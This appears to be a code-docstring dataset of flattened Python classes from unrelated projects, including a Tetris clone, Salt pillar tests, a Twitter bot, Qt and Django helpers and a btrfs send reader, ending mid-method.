class Game(): <NEW_LINE> <INDENT> def __init__(self): <NEW_LINE> <INDENT> self._playfield = Playfield() <NEW_LINE> self.rows = self._playfield.rows <NEW_LINE> self.columns = self._playfield.columns <NEW_LINE> <DEDENT> def hard_drop(self): <NEW_LINE> <INDENT> logging.debug("Game: Did hard drop") <NEW_LINE> <DEDENT> def rotate_acw(self): <NEW_LINE> <INDENT> logging.debug("Game: Did anti-clockwise rotation") <NEW_LINE> <DEDENT> def rotate_cw(self): <NEW_LINE> <INDENT> logging.debug("Game: Did clockwise rotation") <NEW_LINE> <DEDENT> def shift_left(self): <NEW_LINE> <INDENT> logging.debug("Game: Did shift left") <NEW_LINE> <DEDENT> def shift_right(self): <NEW_LINE> <INDENT> logging.debug("Game: Did shift right") <NEW_LINE> <DEDENT> def update(self): <NEW_LINE> <INDENT> logging.debug("Game: Nothing to update :D") <NEW_LINE> <DEDENT> def get_cell_state(self, row, column): <NEW_LINE> <INDENT> return self._playfield.get_cell_state(row, column)
The class coordinates all actions in Clontris.
625990689c8ee82313040d5a
class ExtraMinionDataInPillarTestCase(TestCase, LoaderModuleMockMixin): <NEW_LINE> <INDENT> def setup_loader_modules(self): <NEW_LINE> <INDENT> return {extra_minion_data_in_pillar: {"__virtual__": True}} <NEW_LINE> <DEDENT> def setUp(self): <NEW_LINE> <INDENT> self.pillar = MagicMock() <NEW_LINE> self.extra_minion_data = { "key1": {"subkey1": "value1"}, "key2": {"subkey2": {"subsubkey2": "value2"}}, "key3": "value3", "key4": {"subkey4": "value4"}, } <NEW_LINE> <DEDENT> def test_extra_values_none_or_empty(self): <NEW_LINE> <INDENT> ret = extra_minion_data_in_pillar.ext_pillar( "fake_id", self.pillar, "fake_include", None ) <NEW_LINE> self.assertEqual(ret, {}) <NEW_LINE> ret = extra_minion_data_in_pillar.ext_pillar( "fake_id", self.pillar, "fake_include", {} ) <NEW_LINE> self.assertEqual(ret, {}) <NEW_LINE> <DEDENT> def test_include_all(self): <NEW_LINE> <INDENT> for include_all in ["*", "<all>"]: <NEW_LINE> <INDENT> ret = extra_minion_data_in_pillar.ext_pillar( "fake_id", self.pillar, include_all, self.extra_minion_data ) <NEW_LINE> self.assertEqual(ret, self.extra_minion_data) <NEW_LINE> <DEDENT> <DEDENT> def test_include_specific_keys(self): <NEW_LINE> <INDENT> ret = extra_minion_data_in_pillar.ext_pillar( "fake_id", self.pillar, include=["key1:subkey1", "key2:subkey3", "key3", "key4"], extra_minion_data=self.extra_minion_data, ) <NEW_LINE> self.assertEqual( ret, { "key1": {"subkey1": "value1"}, "key3": "value3", "key4": {"subkey4": "value4"}, }, )
Test cases for salt.pillar.extra_minion_data_in_pillar
625990688da39b475be0498f
class PrivateTimeFramedManager(TimeFramedManager): <NEW_LINE> <INDENT> def get_queryset(self, subscription): <NEW_LINE> <INDENT> queryset = super(PrivateTimeFramedManager, self).get_queryset() <NEW_LINE> return queryset.filter(subscription=subscription)
Model manager used by PrivateTimeFramedMixin models
62599068796e427e5384ff1b
class Wallpaper(object): <NEW_LINE> <INDENT> def __init__(self, width=1600, height=900, filename='wallpaper.png'): <NEW_LINE> <INDENT> self.width = width <NEW_LINE> self.height = height <NEW_LINE> self.filename = filename <NEW_LINE> <DEDENT> def paint_pattern(self): <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> def paint(self): <NEW_LINE> <INDENT> self.image = Image.new(mode='RGB', size=(self.width, self.height), color=(47, 98, 135)) <NEW_LINE> self.paint_pattern() <NEW_LINE> self.image.save(fp=self.filename)
Base class for all wallpapers. Creates a (very) simple single-color wallpaper. Parameters ---------- width: int height: int filename: str Attributes ---------- width: int height: int filename: str image: PIL Image The image which holds the wallpaper.
62599068442bda511e95d92b
class Gist(sgqlc.types.Type, Node, Starrable, UniformResourceLocatable): <NEW_LINE> <INDENT> __schema__ = github_schema <NEW_LINE> __field_names__ = ('comments', 'created_at', 'description', 'files', 'forks', 'is_fork', 'is_public', 'name', 'owner', 'pushed_at', 'updated_at') <NEW_LINE> comments = sgqlc.types.Field(sgqlc.types.non_null(GistCommentConnection), graphql_name='comments', args=sgqlc.types.ArgDict(( ('after', sgqlc.types.Arg(String, graphql_name='after', default=None)), ('before', sgqlc.types.Arg(String, graphql_name='before', default=None)), ('first', sgqlc.types.Arg(Int, graphql_name='first', default=None)), ('last', sgqlc.types.Arg(Int, graphql_name='last', default=None)), )) ) <NEW_LINE> created_at = sgqlc.types.Field(sgqlc.types.non_null(DateTime), graphql_name='createdAt') <NEW_LINE> description = sgqlc.types.Field(String, graphql_name='description') <NEW_LINE> files = sgqlc.types.Field(sgqlc.types.list_of(GistFile), graphql_name='files', args=sgqlc.types.ArgDict(( ('limit', sgqlc.types.Arg(Int, graphql_name='limit', default=10)), ('oid', sgqlc.types.Arg(GitObjectID, graphql_name='oid', default=None)), )) ) <NEW_LINE> forks = sgqlc.types.Field(sgqlc.types.non_null(GistConnection), graphql_name='forks', args=sgqlc.types.ArgDict(( ('after', sgqlc.types.Arg(String, graphql_name='after', default=None)), ('before', sgqlc.types.Arg(String, graphql_name='before', default=None)), ('first', sgqlc.types.Arg(Int, graphql_name='first', default=None)), ('last', sgqlc.types.Arg(Int, graphql_name='last', default=None)), ('order_by', sgqlc.types.Arg(GistOrder, graphql_name='orderBy', default=None)), )) ) <NEW_LINE> is_fork = sgqlc.types.Field(sgqlc.types.non_null(Boolean), graphql_name='isFork') <NEW_LINE> is_public = sgqlc.types.Field(sgqlc.types.non_null(Boolean), graphql_name='isPublic') <NEW_LINE> name = sgqlc.types.Field(sgqlc.types.non_null(String), graphql_name='name') <NEW_LINE> owner = sgqlc.types.Field(RepositoryOwner, graphql_name='owner') <NEW_LINE> pushed_at = sgqlc.types.Field(DateTime, graphql_name='pushedAt') <NEW_LINE> updated_at = sgqlc.types.Field(sgqlc.types.non_null(DateTime), graphql_name='updatedAt')
A Gist.
625990684f88993c371f10f1
class ModelTests(StockManagementAPITestCase): <NEW_LINE> <INDENT> @classmethod <NEW_LINE> def setUpTestData(cls): <NEW_LINE> <INDENT> cls.test_user = UserFactory(username="test_user_1") <NEW_LINE> cls.currency = CurrencyFactory(code="USD", name="United States Dollar") <NEW_LINE> cls.measurement_type = MeasurementTypeFactory() <NEW_LINE> cls.supplier = SupplierFactory( name="Tesla", phone="15051111111", email="[email protected]", address="San Francisco, California, USA", ) <NEW_LINE> cls.material = MaterialFactory( name="Tesla Model 3", total_amount=1.00, accountant=cls.test_user, measurement_value=1650.00, price=50000.00, currency=cls.currency, measurement_type=cls.measurement_type, supplier=cls.supplier, ) <NEW_LINE> <DEDENT> def test_if_material_is_created(self): <NEW_LINE> <INDENT> assert self.material.name == "Tesla Model 3" <NEW_LINE> assert self.material.total_amount == 1.00 <NEW_LINE> assert self.material.measurement_value == 1650.00 <NEW_LINE> assert self.material.price == 50000.00 <NEW_LINE> assert self.material.accountant.username == "test_user_1" <NEW_LINE> <DEDENT> def test_if_currency_is_created(self): <NEW_LINE> <INDENT> assert self.currency.code == "USD" <NEW_LINE> assert self.currency.name == "United States Dollar" <NEW_LINE> <DEDENT> def test_if_measurement_type_is_created(self): <NEW_LINE> <INDENT> assert self.measurement_type.code == "KG" <NEW_LINE> assert self.measurement_type.name == "Kilogram" <NEW_LINE> <DEDENT> def test_if_supplier_is_created_(self): <NEW_LINE> <INDENT> assert self.supplier.name == "Tesla" <NEW_LINE> assert self.supplier.phone == "15051111111" <NEW_LINE> assert self.supplier.email == "[email protected]" <NEW_LINE> assert self.supplier.address == "San Francisco, California, USA"
Creates mock models and checks if they are created successfully.
62599068fff4ab517ebcefc0
class _ThreadedBulkSimulation(): <NEW_LINE> <INDENT> def __init__(self, pool: AbstractPool) -> None: <NEW_LINE> <INDENT> self.pool = pool.clone() <NEW_LINE> self.simulators = set() <NEW_LINE> self.per_thread = 3000 <NEW_LINE> self.processes = [] <NEW_LINE> self.is_constant_pool = isinstance(self.pool, ConstantPool) <NEW_LINE> <DEDENT> def run(self, amount : int): <NEW_LINE> <INDENT> if amount < self.per_thread: <NEW_LINE> <INDENT> bulksim = BulkSimulation(self.pool.clone()) <NEW_LINE> bulksim.run(amount) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> manager = multiprocessing.Manager() <NEW_LINE> data = manager.list() <NEW_LINE> if not self.is_constant_pool: <NEW_LINE> <INDENT> data.append(0) <NEW_LINE> data.append(0) <NEW_LINE> data.append(0) <NEW_LINE> data.append(manager.dict()) <NEW_LINE> for i in self.pool.weights(): <NEW_LINE> <INDENT> data[3][i] = { "failures" : 0, "successes" : 0, "total" : 0 } <NEW_LINE> <DEDENT> <DEDENT> thread_count = amount//self.per_thread <NEW_LINE> for i in range(thread_count): <NEW_LINE> <INDENT> tmp = self.pool.clone() <NEW_LINE> bulksim = BulkSimulation(tmp) <NEW_LINE> self.simulators.add(bulksim) <NEW_LINE> tmp = multiprocessing.Process(target=bulksim.run, args=(self.per_thread, data,)) <NEW_LINE> self.processes.append(tmp) <NEW_LINE> tmp.start() <NEW_LINE> <DEDENT> if 0 < amount%self.per_thread: <NEW_LINE> <INDENT> bulksim = BulkSimulation(self.pool.clone()) <NEW_LINE> bulksim.run(amount%self.per_thread, data) <NEW_LINE> <DEDENT> for i in self.processes: <NEW_LINE> <INDENT> i.join() <NEW_LINE> <DEDENT> success = data[0] <NEW_LINE> failures = data[1] <NEW_LINE> total = data[2] <NEW_LINE> specific = data[3] <NEW_LINE> print(f"\nTotal: {total}") <NEW_LINE> print(f"Success: {success}", f"Failures: {failures}") <NEW_LINE> print(f"Rate: {(success/total)*100}%")
Same as BulkSimulation, but uses multiprocessing to reeally pump up some speed into it, much faster on higher counts Probably wont use it in any bot command, as its super heavy too
625990688e7ae83300eea833
class QueryBackSourceRulesRequest(JDCloudRequest): <NEW_LINE> <INDENT> def __init__(self, parameters, header=None, version="v1"): <NEW_LINE> <INDENT> super(QueryBackSourceRulesRequest, self).__init__( '/domain/{domain}/queryBackSourceRules', 'GET', header, version) <NEW_LINE> self.parameters = parameters
查询回源改写批量配置
62599068f7d966606f74948d
class NewFiatBankDeposit(object): <NEW_LINE> <INDENT> def __init__(self, amount=None, message=None, bank=None, dep_type=None): <NEW_LINE> <INDENT> self.swagger_types = { 'amount': 'int', 'message': 'str', 'bank': 'str', 'dep_type': 'str' } <NEW_LINE> self.attribute_map = { 'amount': 'amount', 'message': 'message', 'bank': 'bank', 'dep_type': 'depType' } <NEW_LINE> self._amount = amount <NEW_LINE> self._message = message <NEW_LINE> self._bank = bank <NEW_LINE> self._dep_type = dep_type <NEW_LINE> <DEDENT> @property <NEW_LINE> def amount(self): <NEW_LINE> <INDENT> return self._amount <NEW_LINE> <DEDENT> @amount.setter <NEW_LINE> def amount(self, amount): <NEW_LINE> <INDENT> if amount is None: <NEW_LINE> <INDENT> raise ValueError("Invalid value for `amount`, must not be `None`") <NEW_LINE> <DEDENT> self._amount = amount <NEW_LINE> <DEDENT> @property <NEW_LINE> def message(self): <NEW_LINE> <INDENT> return self._message <NEW_LINE> <DEDENT> @message.setter <NEW_LINE> def message(self, message): <NEW_LINE> <INDENT> if message is None: <NEW_LINE> <INDENT> raise ValueError("Invalid value for `message`, must not be `None`") <NEW_LINE> <DEDENT> self._message = message <NEW_LINE> <DEDENT> @property <NEW_LINE> def bank(self): <NEW_LINE> <INDENT> return self._bank <NEW_LINE> <DEDENT> @bank.setter <NEW_LINE> def bank(self, bank): <NEW_LINE> <INDENT> if bank is None: <NEW_LINE> <INDENT> raise ValueError("Invalid value for `bank`, must not be `None`") <NEW_LINE> <DEDENT> self._bank = bank <NEW_LINE> <DEDENT> @property <NEW_LINE> def dep_type(self): <NEW_LINE> <INDENT> return self._dep_type <NEW_LINE> <DEDENT> @dep_type.setter <NEW_LINE> def dep_type(self, dep_type): <NEW_LINE> <INDENT> if dep_type is None: <NEW_LINE> <INDENT> raise ValueError("Invalid value for `dep_type`, must not be `None`") <NEW_LINE> <DEDENT> self._dep_type = dep_type <NEW_LINE> <DEDENT> def to_dict(self): <NEW_LINE> <INDENT> result = {} <NEW_LINE> for attr, _ in iteritems(self.swagger_types): <NEW_LINE> <INDENT> value = getattr(self, attr) <NEW_LINE> if isinstance(value, list): <NEW_LINE> <INDENT> result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) <NEW_LINE> <DEDENT> elif hasattr(value, "to_dict"): <NEW_LINE> <INDENT> result[attr] = value.to_dict() <NEW_LINE> <DEDENT> elif isinstance(value, dict): <NEW_LINE> <INDENT> result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> result[attr] = value <NEW_LINE> <DEDENT> <DEDENT> return result <NEW_LINE> <DEDENT> def to_str(self): <NEW_LINE> <INDENT> return pformat(self.to_dict()) <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return self.to_str() <NEW_LINE> <DEDENT> def __eq__(self, other): <NEW_LINE> <INDENT> return self.__dict__ == other.__dict__ <NEW_LINE> <DEDENT> def __ne__(self, other): <NEW_LINE> <INDENT> return not self == other
NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually.
625990684e4d562566373bac
class StorageFlexUtilHealth(ManagedObject): <NEW_LINE> <INDENT> consts = StorageFlexUtilHealthConsts() <NEW_LINE> naming_props = set([]) <NEW_LINE> mo_meta = { "classic": MoMeta("StorageFlexUtilHealth", "storageFlexUtilHealth", "health", VersionMeta.Version304a, "OutputOnly", 0xf, [], ["admin", "read-only", "user"], ['storageFlexUtilController'], [], ["Get"]), } <NEW_LINE> prop_meta = { "classic": { "child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version304a, MoPropertyMeta.INTERNAL, None, None, None, None, [], []), "dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version304a, MoPropertyMeta.READ_ONLY, 0x2, 0, 255, None, [], []), "health": MoPropertyMeta("health", "health", "string", VersionMeta.Version304a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []), "rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version304a, MoPropertyMeta.READ_ONLY, 0x4, 0, 255, None, [], []), "status": MoPropertyMeta("status", "status", "string", VersionMeta.Version304a, MoPropertyMeta.READ_ONLY, 0x8, None, None, None, ["", "created", "deleted", "modified", "removed"], []), }, } <NEW_LINE> prop_map = { "classic": { "childAction": "child_action", "dn": "dn", "health": "health", "rn": "rn", "status": "status", }, } <NEW_LINE> def __init__(self, parent_mo_or_dn, **kwargs): <NEW_LINE> <INDENT> self._dirty_mask = 0 <NEW_LINE> self.child_action = None <NEW_LINE> self.health = None <NEW_LINE> self.status = None <NEW_LINE> ManagedObject.__init__(self, "StorageFlexUtilHealth", parent_mo_or_dn, **kwargs)
This is StorageFlexUtilHealth class.
62599068d486a94d0ba2d764
class Twitter: <NEW_LINE> <INDENT> def __init__(self) -> None: <NEW_LINE> <INDENT> auth = tweepy.OAuthHandler(os.environ["API_KEY"], os.environ["API_SECRET"]) <NEW_LINE> auth.set_access_token(os.environ["ACCESS_TOKEN"], os.environ["ACCESS_TOKEN_SECRET"]) <NEW_LINE> self.api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True) <NEW_LINE> <DEDENT> @staticmethod <NEW_LINE> def _compose(constituency: Constituency) -> dict: <NEW_LINE> <INDENT> if constituency.dc_winner == Faction.nonpartisan: <NEW_LINE> <INDENT> affiliation = "non-partisan" <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> affiliation = f"pro-{constituency.dc_winner.name}" <NEW_LINE> <DEDENT> text = f"{constituency.electoral_code}: " f"{constituency.caption.en}, {constituency.caption.zh}.\n" f"Voted {affiliation} in the 2019 District Council elections." <NEW_LINE> return {"status": text, "lat": constituency.geo.lat, "long": constituency.geo.long} <NEW_LINE> <DEDENT> def update(self, constituency: Constituency, dry_run: bool = False) -> tweepy.Status: <NEW_LINE> <INDENT> composition = self._compose(constituency) <NEW_LINE> LOG.info("Selecting %s, %s, %s", constituency.electoral_code, constituency.caption.en, constituency.caption.zh) <NEW_LINE> if dry_run: <NEW_LINE> <INDENT> return tweepy.Status <NEW_LINE> <DEDENT> media = self.api.media_upload(filename=constituency.file) <NEW_LINE> self.api.create_media_metadata(media.media_id, constituency.caption.en) <NEW_LINE> return self.api.update_status(**composition, media_ids=[media.media_id])
Wrapper for the Twitter API
62599068ac7a0e7691f73c8b
class GaussianPrior(object): <NEW_LINE> <INDENT> def __init__(self, m, sigma): <NEW_LINE> <INDENT> self.m = m <NEW_LINE> self.sigma = sigma <NEW_LINE> <DEDENT> def __call__(self, cube): <NEW_LINE> <INDENT> return stats.norm.ppf(cube,scale=self.sigma,loc=self.m) <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return "gaussian prior - mean {0} std {1}".format(self.m, self.sigma)
A gaussian prior Parameters ---------- m: ~float mean of the distribution sigma: ~float sigma of the distribution
625990687c178a314d78e7be
class EventDestination(AWSProperty): <NEW_LINE> <INDENT> props: PropsDictType = { "CloudWatchDestination": (CloudWatchDestination, False), "Enabled": (boolean, False), "KinesisFirehoseDestination": (KinesisFirehoseDestination, False), "MatchingEventTypes": ([str], True), "Name": (str, False), }
`EventDestination <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-ses-configurationseteventdestination-eventdestination.html>`__
625990682ae34c7f260ac88d
class SASqc: <NEW_LINE> <INDENT> def __init__(self, session, *args, **kwargs): <NEW_LINE> <INDENT> self.sasproduct = "qc" <NEW_LINE> self.logger = logging.getLogger(__name__) <NEW_LINE> self.logger.setLevel(logging.WARN) <NEW_LINE> self.sas = session <NEW_LINE> logging.debug("Initialization of SAS Macro: " + self.sas.saslog()) <NEW_LINE> <DEDENT> def cusum(self, **kwargs: dict) -> 'SASresults': <NEW_LINE> <INDENT> required_set = {} <NEW_LINE> legal_set = {'by', 'xchart', 'procopts'} <NEW_LINE> logger.debug("kwargs type: " + str(type(kwargs))) <NEW_LINE> return SASProcCommons._run_proc(self, "CUSUM", required_set, legal_set, **kwargs) <NEW_LINE> <DEDENT> def macontrol(self, **kwargs: dict) -> 'SASresults': <NEW_LINE> <INDENT> required_set = {} <NEW_LINE> legal_set = {'procopts'} <NEW_LINE> logger.debug("kwargs type: " + str(type(kwargs))) <NEW_LINE> return SASProcCommons._run_proc(self, "MACONTROL", required_set, legal_set, **kwargs) <NEW_LINE> <DEDENT> def capability(self, **kwargs: dict) -> 'SASresults': <NEW_LINE> <INDENT> required_set = {} <NEW_LINE> legal_set = {'cdfplot', 'comphist', 'histogram', 'inset', 'intervals', 'output', 'ppplot', 'probplot', 'qqplot', 'freq', 'weight', 'id', 'by', 'spec', 'out', 'procopts'} <NEW_LINE> logger.debug("kwargs type: " + str(type(kwargs))) <NEW_LINE> return SASProcCommons._run_proc(self, "CAPABILITY", required_set, legal_set, **kwargs) <NEW_LINE> <DEDENT> def shewhart(self, **kwargs: dict) -> 'SASresults': <NEW_LINE> <INDENT> required_set = {} <NEW_LINE> legal_set = {'procopts'} <NEW_LINE> logger.debug("kwargs type: " + str(type(kwargs))) <NEW_LINE> return SASProcCommons._run_proc(self, "SHEWHART", required_set, legal_set, **kwargs)
This class is for SAS/QC procedures to be called as python3 objects and use SAS as the computational engine This class and all the useful work in this package require a licensed version of SAS. To add a new procedure do the following: #. Create a new method for the procedure #. Create the set of required statements. If there are no required statements then create an empty set {} #. Create the legal set of statements. This can often be obtained from the documentation of the procedure. 'procopts' should always be included in the legal set to allow flexibility in calling the procedure. #. Create the doc string with the following parts at a minimum: - Procedure Name - Required set - Legal set - Link to the procedure documentation #. Add the return call for the method using an existing procedure as an example #. Verify that all the statements in the required and legal sets are listed in _makeProcCallMacro method of sasproccommons.py #. Write at least one test to exercise the procedures and include it in the appropriate testing file
6259906867a9b606de547674
class BinOr: <NEW_LINE> <INDENT> a_ = True <NEW_LINE> b_ = True <NEW_LINE> def __init__(self, a, b): <NEW_LINE> <INDENT> self.a_ = a <NEW_LINE> self.b_ = b <NEW_LINE> <DEDENT> def evaluate(self): <NEW_LINE> <INDENT> return self.a_.evaluate() or self.b_.evaluate()
Binární operace OR. Vrací TRUE, pokud alespoň jeden vstup je TRUE.
62599068e1aae11d1e7cf3df
class DictTableModel(QtCore.QAbstractTableModel): <NEW_LINE> <INDENT> def __init__(self): <NEW_LINE> <INDENT> super().__init__() <NEW_LINE> self.lock = Mutex() <NEW_LINE> self.headers = ['Name'] <NEW_LINE> self.storage = OrderedDict() <NEW_LINE> <DEDENT> def getKeyByNumber(self, n): <NEW_LINE> <INDENT> i = 0 <NEW_LINE> if not(0 <= n < len(self.storage)): <NEW_LINE> <INDENT> raise IndexError <NEW_LINE> <DEDENT> it = iter(self.storage) <NEW_LINE> key = next(it) <NEW_LINE> while(i<n): <NEW_LINE> <INDENT> key = next(it) <NEW_LINE> i += 1 <NEW_LINE> <DEDENT> return key <NEW_LINE> <DEDENT> def getNumberByKey(self, key): <NEW_LINE> <INDENT> i = 0 <NEW_LINE> it = iter(self.storage) <NEW_LINE> newkey = next(it) <NEW_LINE> while(key != newkey): <NEW_LINE> <INDENT> newkey = next(it) <NEW_LINE> i += 1 <NEW_LINE> <DEDENT> return i <NEW_LINE> <DEDENT> def rowCount(self, parent = QtCore.QModelIndex()): <NEW_LINE> <INDENT> return len(self.storage) <NEW_LINE> <DEDENT> def columnCount(self, parent = QtCore.QModelIndex()): <NEW_LINE> <INDENT> return len(self.headers) <NEW_LINE> <DEDENT> def flags(self, index): <NEW_LINE> <INDENT> return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable <NEW_LINE> <DEDENT> def data(self, index, role): <NEW_LINE> <INDENT> if not index.isValid(): <NEW_LINE> <INDENT> return None <NEW_LINE> <DEDENT> elif role == QtCore.Qt.DisplayRole: <NEW_LINE> <INDENT> key = self.getKeyByNumber(index.row()) <NEW_LINE> if index.column() == 0: <NEW_LINE> <INDENT> return key <NEW_LINE> <DEDENT> elif index.column() == 1: <NEW_LINE> <INDENT> return self.storage[key] <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> return None <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> return None <NEW_LINE> <DEDENT> <DEDENT> def headerData(self, section, orientation, role = QtCore.Qt.DisplayRole): <NEW_LINE> <INDENT> if not(0 <= section < len(self.headers)): <NEW_LINE> <INDENT> return None <NEW_LINE> <DEDENT> elif role != QtCore.Qt.DisplayRole: <NEW_LINE> <INDENT> return None <NEW_LINE> <DEDENT> elif orientation != QtCore.Qt.Horizontal: <NEW_LINE> <INDENT> return None <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> return self.headers[section] <NEW_LINE> <DEDENT> <DEDENT> def add(self, key, data): <NEW_LINE> <INDENT> with self.lock: <NEW_LINE> <INDENT> if key in self.storage: <NEW_LINE> <INDENT> return None <NEW_LINE> <DEDENT> row = len(self.storage) <NEW_LINE> self.beginInsertRows(QtCore.QModelIndex(), row, row) <NEW_LINE> self.storage[key] = data <NEW_LINE> self.endInsertRows() <NEW_LINE> return key <NEW_LINE> <DEDENT> <DEDENT> def pop(self, key): <NEW_LINE> <INDENT> with self.lock: <NEW_LINE> <INDENT> if key in self.storage: <NEW_LINE> <INDENT> row = self.getNumberByKey(key) <NEW_LINE> self.beginRemoveRows(QtCore.QModelIndex(), row, row) <NEW_LINE> ret = self.storage.pop(key) <NEW_LINE> self.endRemoveRows() <NEW_LINE> return ret
Qt model storing a tabel in dictionaries
625990687d847024c075db7f
class ServerThread(threading.Thread): <NEW_LINE> <INDENT> def __init__(self, dir, file): <NEW_LINE> <INDENT> self.dir = dir <NEW_LINE> self.file = file <NEW_LINE> super().__init__(name=f'server-{file}') <NEW_LINE> <DEDENT> def run(self): <NEW_LINE> <INDENT> print(f'Running server {self.file} in {self.dir}') <NEW_LINE> try: <NEW_LINE> <INDENT> subprocess.run(f'start "Server" /D "{self.dir}" /MIN /HIGH "{self.file}"', shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) <NEW_LINE> <DEDENT> except Exception as ex: <NEW_LINE> <INDENT> print(f'Error running {self.file}:\n\n') <NEW_LINE> traceback.print_exc()
A thread to run a server. This is a simple thread implementation, which will run a server start file in another thread, so it doesn't block the current thread.
625990687047854f46340b5a
class WebUiBaseMind(object): <NEW_LINE> <INDENT> def __init__(self, request, cred): <NEW_LINE> <INDENT> self.request = request <NEW_LINE> self.credentials = cred <NEW_LINE> <DEDENT> def isLocal(self): <NEW_LINE> <INDENT> if self.request.getClientIP() == '127.0.0.1': <NEW_LINE> <INDENT> return True <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> return False
Base class for the 'mind' object, representing authenticated user.
62599068dd821e528d6da554
class TokenConsumerBackend(object): <NEW_LINE> <INDENT> def authenticate(self, username=None, password=None): <NEW_LINE> <INDENT> endpoints = token_settings.AUTH_ENDPOINTS <NEW_LINE> base = token_settings.API_BASE_URL <NEW_LINE> response = requests.post(base+endpoints['LOGIN'], data={ 'username': username, 'password': password }) <NEW_LINE> if response.status_code == 200: <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> user = User.objects.get(username=username) <NEW_LINE> <DEDENT> except User.DoesNotExist: <NEW_LINE> <INDENT> user = User(username=username, password="Password Not Stored") <NEW_LINE> user.save() <NEW_LINE> <DEDENT> data = response.json() <NEW_LINE> try: <NEW_LINE> <INDENT> user.token.key = data['key'] <NEW_LINE> <DEDENT> except Token.DoesNotExist: <NEW_LINE> <INDENT> token = Token(key=data['key'], user=user) <NEW_LINE> token.save() <NEW_LINE> <DEDENT> return user <NEW_LINE> <DEDENT> return None <NEW_LINE> <DEDENT> def get_user(self, user_id): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> return User.objects.get(pk=user_id) <NEW_LINE> <DEDENT> except User.DoesNotExist: <NEW_LINE> <INDENT> return None
User an external token-based login system for django authentication. Will maintain login locally and with remote server, and decorate the api calls with the appropriate header
625990684e4d562566373bad
class Arg: <NEW_LINE> <INDENT> def __init__(self, name, atype, modifier, size=None, comment=None): <NEW_LINE> <INDENT> self.__name = name <NEW_LINE> self.__type = atype <NEW_LINE> self.__modifier = modifier <NEW_LINE> self.__size = size <NEW_LINE> self.__comment = comment <NEW_LINE> <DEDENT> def get_name(self): <NEW_LINE> <INDENT> return self.__name <NEW_LINE> <DEDENT> def get_type(self): <NEW_LINE> <INDENT> return self.__type <NEW_LINE> <DEDENT> def get_modifier(self): <NEW_LINE> <INDENT> return self.__modifier <NEW_LINE> <DEDENT> def get_size(self): <NEW_LINE> <INDENT> return self.__size <NEW_LINE> <DEDENT> def get_comment(self): <NEW_LINE> <INDENT> return self.__comment <NEW_LINE> <DEDENT> def set_comment(self, comment): <NEW_LINE> <INDENT> self.__comment = comment <NEW_LINE> <DEDENT> def set_type(self, type): <NEW_LINE> <INDENT> self.__type = type
Data container for all the port name, type, etc. associated with component.
62599068aad79263cf42ff5f
class MyUserAgentMiddleware(UserAgentMiddleware): <NEW_LINE> <INDENT> def __init__(self, user_agent): <NEW_LINE> <INDENT> self.user_agent = user_agent <NEW_LINE> <DEDENT> @classmethod <NEW_LINE> def from_crawler(cls, crawler): <NEW_LINE> <INDENT> return cls( user_agent=crawler.settings.get('MY_USER_AGENT') ) <NEW_LINE> <DEDENT> def process_request(self, request, spider): <NEW_LINE> <INDENT> agent = random.choice(self.user_agent) <NEW_LINE> request.headers['User-Agent'] = agent
设置 User-Agent
625990683539df3088ecda45
class MockRecord: <NEW_LINE> <INDENT> def __init__(self): <NEW_LINE> <INDENT> self.userid = None <NEW_LINE> self.remoteip = None
Mocks a logging construct to receive data to be interpolated.
6259906801c39578d7f14308
class UnknownMsgError(RuntimeError): <NEW_LINE> <INDENT> pass
Exception raised in case of unknown Message.
625990684f88993c371f10f2
class _Reader(io.RawIOBase): <NEW_LINE> <INDENT> def __init__(self, process, stream, path, diff, showProgress): <NEW_LINE> <INDENT> self.process = process <NEW_LINE> self.stream = stream <NEW_LINE> self.path = path <NEW_LINE> self.diff = diff <NEW_LINE> self.bytesRead = None <NEW_LINE> self.progress = DisplayProgress() if showProgress else None <NEW_LINE> <DEDENT> def __enter__(self): <NEW_LINE> <INDENT> self.bytesRead = 0 <NEW_LINE> if self.progress is not None: <NEW_LINE> <INDENT> self.progress.open() <NEW_LINE> <DEDENT> return self <NEW_LINE> <DEDENT> def __exit__(self, exceptionType, exception, trace): <NEW_LINE> <INDENT> self.stream.close() <NEW_LINE> if self.progress is not None: <NEW_LINE> <INDENT> self.progress.close() <NEW_LINE> <DEDENT> if self.process is None: <NEW_LINE> <INDENT> return <NEW_LINE> <DEDENT> logger.debug("Waiting for send process to finish...") <NEW_LINE> self.process.wait() <NEW_LINE> if self.process.returncode != 0: <NEW_LINE> <INDENT> logger.error("btrfs send errors") <NEW_LINE> for line in self.process.stderr: <NEW_LINE> <INDENT> sys.stderr.write(line) <NEW_LINE> <DEDENT> <DEDENT> if exception is None and self.process.returncode != 0: <NEW_LINE> <INDENT> raise Exception( "send returned error %d. %s may be corrupt." % (self.process.returncode, self.path) ) <NEW_LINE> <DEDENT> <DEDENT> def read(self, size): <NEW_LINE> <INDENT> data = self.stream.read(size) <NEW_LINE> if FIXUP_DURING_SEND and self.bytesRead == 0: <NEW_LINE> <INDENT> data = send.replaceIDs( data, self.diff.toUUID, self.diff.toGen, self.diff.fromUUID, self.diff.fromGen, ) <NEW_LINE> <DEDENT> self.bytesRead += len(data) <NEW_LINE> if self.progress is not None: <NEW_LINE> <INDENT> self.progress.update(self.bytesRead) 